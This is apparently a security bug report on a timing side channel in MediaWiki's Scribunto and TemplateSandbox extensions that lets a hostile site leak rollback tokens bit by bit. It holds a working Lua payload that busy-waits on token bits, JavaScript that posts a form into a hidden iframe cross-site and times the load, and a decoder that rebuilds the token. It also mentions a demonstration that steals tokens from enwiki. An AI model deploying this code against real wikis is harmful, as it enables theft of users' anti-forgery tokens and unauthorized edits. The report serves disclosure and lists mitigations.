demonstration
Scribunto modules can branch on the contents of arbitrary wiki pages, including transcludable special pages. This becomes dangerous when combined with a malicious module added to the Module namespace, OR when all of the following circumstances apply (making that unnecessary):
- The TemplateSandbox extension is installed.
- The attacker knows the name and contents of an existing module.
- The attacker knows the name of at least one page that uses that module.
In either case it is possible for an attacker's site, while open in the victim's browser, to extract a small amount of data from the wiki through a timing side channel. For example:
- Via TemplateSandbox, the attacker's site supplies a malicious Scribunto module to be used in place of an existing one in the Module namespace. Because TemplateSandbox does not require an edit token, this can be done cross-site by submitting a form into an iframe.
- The module preprocesses {{Special:Contributions/...}} and then unstrips the result to obtain the rendered HTML, including the rollback tokens in any rollback links.
- The module delays its return depending on the value of one bit of the rollback token, for example by busy-waiting on os.clock().
- The attacker's site measures how long the iframe takes to finish loading, which depends on the bit's value. Repeating this for each bit recovers the token.
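The following is an added example modelling the four bullets above; it is not the demonstration attached to this report. The decoder runs offline against a simulated wiki (a constructed secret plus deterministic jitter and stalls), while the Lua payload and the iframe timing helper are what an attacker page would use for real. Assumptions for illustration: the Scribunto calls frame:preprocess, mw.text.unstrip and os.clock behave as the report describes, TemplateSandbox accepts form fields named title/text/page, and the rollback link in the contributions HTML contains "token=<hex>".

```javascript
// Added example modelling the four bullets above; it is not the demonstration attached to
// this report. Assumptions: Scribunto's frame:preprocess, mw.text.unstrip and os.clock behave
// as described; TemplateSandbox takes fields title/text/page; the rollback link has "token=<hex>".

// Lua text the attacker submits through TemplateSandbox in place of the real module (same
// name, so a page that {{#invoke:}}s it runs this instead). Each render leaks one bit: bitIndex 0
// is the top bit of the token's first hex digit; a negative index never delays (baseline timing).
function luaModuleForBit(bitIndex, targetUser, delaySeconds) {
  return `local p = {}
function p.main(frame)
  -- Render the special page, then unstrip it to reach the raw HTML.
  local html = mw.text.unstrip(frame:preprocess('{{Special:Contributions/${targetUser}}}'))
  local token = html:match('token=([%x]+)') or ''   -- assumed shape of the rollback link
  local i = ${bitIndex}
  if i >= 0 and i < #token * 4 then
    local pos = math.floor(i / 4) + 1
    local digit = tonumber(token:sub(pos, pos), 16)
    -- Lua 5.1 has no bit operators and no sleep: test the bit arithmetically and busy-wait
    -- on os.clock() when it is set (keep the delay well under Scribunto's CPU limit).
    if math.floor(digit / 2 ^ (3 - i % 4)) % 2 == 1 then
      local stop = os.clock() + ${delaySeconds}
      while os.clock() < stop do end
    end
  end
  return ''
end
return p`;
}

// Browser only: post the sandbox form into a hidden iframe and resolve with the
// milliseconds until the frame's load event fires.
function timeSandboxRender(wikiBase, moduleTitle, pageTitle, luaText) {
  return new Promise((resolve) => {
    const frame = document.createElement('iframe');
    frame.name = 'probe-' + Math.random().toString(36).slice(2);
    frame.style.display = 'none';
    const form = document.createElement('form');
    form.method = 'POST';
    form.action = wikiBase + '/wiki/Special:TemplateSandbox';
    form.target = frame.name;
    for (const [name, value] of Object.entries({ title: moduleTitle, text: luaText, page: pageTitle })) {
      form.appendChild(Object.assign(document.createElement('input'), { type: 'hidden', name, value }));
    }
    const start = performance.now();
    frame.addEventListener('load', () => { resolve(performance.now() - start); frame.remove(); form.remove(); });
    document.body.append(frame, form);
    form.submit();
  });
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

async function sampleMedian(measure, bitIndex, samples) {
  const times = [];
  for (let i = 0; i < samples; i++) times.push(await measure(bitIndex));
  return median(times);
}

// Decoder. `measure(bitIndex)` resolves to one observed load time in ms (in the browser:
// timeSandboxRender(...) with luaModuleForBit(bitIndex, ...)). Loads are noisy, so each bit is
// sampled several times and the median is compared against a threshold halfway between the
// baseline render and a render that hit the delay.
async function recoverTokenHex(measure, hexDigits, delayMs, samples) {
  const threshold = (await sampleMedian(measure, -1, samples)) + delayMs / 2;
  let hex = '';
  for (let d = 0; d < hexDigits; d++) {
    let digit = 0;
    for (let b = 0; b < 4; b++) {
      const t = await sampleMedian(measure, d * 4 + b, samples);
      digit = digit * 2 + (t > threshold ? 1 : 0);
    }
    hex += digit.toString(16);
  }
  return hex;
}

// Bit `bitIndex` of a hex string, top bit of the first digit first (mirrors the Lua above).
function tokenBit(hex, bitIndex) {
  if (bitIndex < 0 || bitIndex >= hex.length * 4) return 0;
  return (parseInt(hex[bitIndex >> 2], 16) >> (3 - (bitIndex & 3))) & 1;
}

// Offline stand-in for the wiki: a constructed secret, a seeded LCG for jitter (repeatable),
// and every fourth load stalled by 3 s to model a slow request that the median must absorb.
function simulatedOracle(secretHex, delayMs, seed = 12345) {
  let state = seed >>> 0, calls = 0;
  const jitter = () => { state = (Math.imul(state, 1664525) + 1013904223) >>> 0; return (state / 2 ** 32) * 150; };
  return async (bitIndex) => {
    const stall = calls++ % 4 === 0 ? 3000 : 0;
    return 400 + jitter() + stall + (tokenBit(secretHex, bitIndex) ? delayMs : 0);
  };
}

// Stand-alone run against the simulated wiki.
const DEMO_SECRET = '9f3c07ab';
recoverTokenHex(simulatedOracle(DEMO_SECRET, 2000), DEMO_SECRET.length, 2000, 7)
  .then((hex) => console.log('recovered', hex, hex === DEMO_SECRET ? 'OK' : 'MISMATCH'));
```

The baseline probe (a module that never delays) is what makes the threshold robust to the wiki's normal render time, and sampling each bit several times with a median keeps a single slow request from flipping a bit; with a 2 s delay per set bit and a 32-bit token this costs a few hundred renders, which is in line with the "about three minutes" the report quotes.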
A demonstration is attached that steals a rollback token from enwiki in about three minutes. Of course, you need the "rollback" right there for it to work, and you may need to use Firefox. Alternatively, you can change it to run against a test wiki that has $wgSessionsInObjectCache = true and the pages Module:Bananas and Module:Bananas/doc (export from enwiki).
Two ways to make this harder to exploit:
- To prevent access to tokens, do not allow Scribunto modules to unstrip special page HTML.
- To make it harder to get malicious modules executed, do not allow TemplateSandbox to function without an edit token.
Version: unspecified
Severity: normal
Attached: